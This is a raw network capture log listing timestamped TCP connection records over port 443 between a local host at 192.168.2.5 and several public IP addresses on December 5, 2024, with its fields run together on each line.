                                                                                        Dec 5, 2024 22:50:23.193662882 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.195178986 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.195250034 CET44349757172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.195322037 CET49757443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.196101904 CET49767443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.196146965 CET44349767172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.196223974 CET49767443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.198010921 CET49767443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.198030949 CET44349767172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.390537977 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.390599966 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.390614033 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.390646935 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.390667915 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.390693903 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.390700102 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.390717983 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.390734911 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.390754938 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.391447067 CET49759443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.391472101 CET44349759142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.391957998 CET49769443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.391992092 CET44349769142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.392093897 CET49769443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.392319918 CET49769443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.392333984 CET44349769142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410783052 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410830021 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410887957 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.410917044 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410931110 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.410969019 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.411772013 CET49758443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.411787987 CET44349758142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.412344933 CET49770443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.412395000 CET44349770142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.412584066 CET49770443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.412811995 CET49770443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.412826061 CET44349770142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.655956030 CET49766443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.655987024 CET49767443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.656004906 CET49769443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.656033993 CET49770443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:23.658260107 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.658288002 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.658464909 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.659353018 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.659368038 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.659854889 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.659903049 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.659986019 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.660202026 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:23.660217047 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.783472061 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.784055948 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.784084082 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.784569979 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.784579039 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.785644054 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.785929918 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.785954952 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.786266088 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.786271095 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788002014 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788255930 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.788263083 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788523912 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788580894 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.788584948 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.788784981 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.788820028 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.789087057 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.789094925 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.792505980 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.792882919 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.792907000 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:23.793174028 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:23.793179035 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.217926025 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.217997074 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.218408108 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.218450069 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.218468904 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.218486071 CET49761443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.218492985 CET4434976113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.220069885 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.220156908 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.220290899 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.220344067 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.220344067 CET49762443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.220362902 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.220371962 CET4434976213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.222162962 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.222206116 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.222475052 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.222726107 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.222738981 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223242998 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223301888 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223426104 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223428965 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223448038 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223472118 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223476887 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223483086 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223484039 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223516941 CET49760443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223521948 CET4434976013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223541021 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223596096 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223650932 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223665953 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223668098 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223686934 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.223705053 CET49763443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.223711014 CET4434976313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.225733042 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.225770950 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.225862026 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.225924015 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.225934029 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.225982904 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.226039886 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.226054907 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.226131916 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.226142883 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.232114077 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.232182026 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.232250929 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.232454062 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.232472897 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.232486963 CET49764443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.232491970 CET4434976413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.234658957 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.234688997 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:24.235574007 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.235696077 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:24.235713959 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.351557970 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.351680994 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.352216005 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.352365971 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.356343985 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.356358051 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.356662035 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.356723070 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.357145071 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.403338909 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.543704987 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.543895960 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.544471979 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.544540882 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.548288107 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.548316002 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.548648119 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.548712015 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.549046993 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:25.595335960 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.939117908 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.939646006 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.939995050 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.939996004 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.940026999 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.940026999 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.940407038 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.940413952 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.940494061 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.940500975 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.941368103 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.941693068 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.941719055 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.942055941 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.942065001 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.947031975 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.947387934 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.947396994 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.947793961 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.947798014 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.958549976 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.959005117 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.959031105 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:25.959381104 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:25.959388971 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.263269901 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.263417959 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.263463974 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.263514042 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.263701916 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.263751984 CET44349771172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.263807058 CET49771443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.264442921 CET49782443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.264493942 CET44349782172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.264509916 CET49783443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:26.264517069 CET44349783142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.264612913 CET49782443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.264887094 CET49783443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:26.264887094 CET49782443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.264904976 CET44349782172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.264935970 CET49783443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:26.264945984 CET44349783142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.376024961 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.376090050 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.376178026 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.376456022 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.376476049 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.376490116 CET49776443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.376496077 CET4434977613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.376863003 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.376928091 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.376995087 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.377074003 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.377095938 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.377124071 CET49775443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.377130032 CET4434977513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.378318071 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.378372908 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.378432035 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.378551006 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.378567934 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.378577948 CET49777443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.378582954 CET4434977713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.380100965 CET49784443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.380145073 CET4434978413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.380218983 CET49784443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.380446911 CET49785443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.380477905 CET4434978513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.380531073 CET49785443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.380597115 CET49784443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.380610943 CET4434978413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.380685091 CET49785443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.380698919 CET4434978513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.380964994 CET49786443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.380973101 CET4434978613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.381025076 CET49786443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.381176949 CET49786443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.381185055 CET4434978613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.382977962 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.383034945 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.383074045 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.383172989 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.383182049 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.383192062 CET49778443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.383198023 CET4434977813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.385171890 CET49787443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.385179996 CET4434978713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.385262966 CET49787443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.385390997 CET49787443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.385401964 CET4434978713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.395085096 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.395136118 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.395195007 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.395304918 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.395315886 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.395328999 CET49779443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.395332098 CET4434977913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.397243023 CET49788443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.397283077 CET4434978813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.397371054 CET49788443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.397475958 CET49788443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:26.397490978 CET4434978813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.453876972 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.453986883 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.454015017 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.454065084 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.454116106 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.454154015 CET44349772172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.454205990 CET49772443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.454765081 CET49789443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:26.454822063 CET44349789142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.454891920 CET49789443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:26.455018997 CET49790443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.455025911 CET44349790172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.455073118 CET49790443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.455338001 CET49789443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:26.455348969 CET44349789142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:26.455540895 CET49790443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:26.455550909 CET44349790172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:27.654784918 CET49782443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:27.654855013 CET49783443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:27.654886961 CET49789443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:27.654922009 CET49790443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:27.655782938 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:27.655819893 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:27.655911922 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:27.656249046 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:27.656260967 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:27.658664942 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:27.658691883 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:27.658771038 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:27.659259081 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:27.659271002 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.096291065 CET4434978613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.097120047 CET49786443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.097156048 CET4434978613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.097605944 CET49786443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.097613096 CET4434978613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.101124048 CET4434978413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.101429939 CET49784443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.101438046 CET4434978413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.101769924 CET49784443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.101775885 CET4434978413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.101849079 CET4434978713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.102081060 CET49787443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.102097988 CET4434978713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.102413893 CET49787443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.102417946 CET4434978713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.112013102 CET4434978813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.112296104 CET49788443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.112323046 CET4434978813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.112624884 CET49788443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.112634897 CET4434978813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.531116962 CET4434978613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.531184912 CET4434978613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.531244993 CET49786443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.532974958 CET49786443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.532993078 CET4434978613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.535640001 CET4434978413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.535701990 CET4434978413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.536103010 CET49784443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.536155939 CET49784443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.536171913 CET4434978413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.536183119 CET49784443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.536189079 CET4434978413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.536788940 CET49795443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.536819935 CET4434979513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.536878109 CET49795443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.537818909 CET49795443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.537832022 CET4434979513.107.246.63192.168.2.5
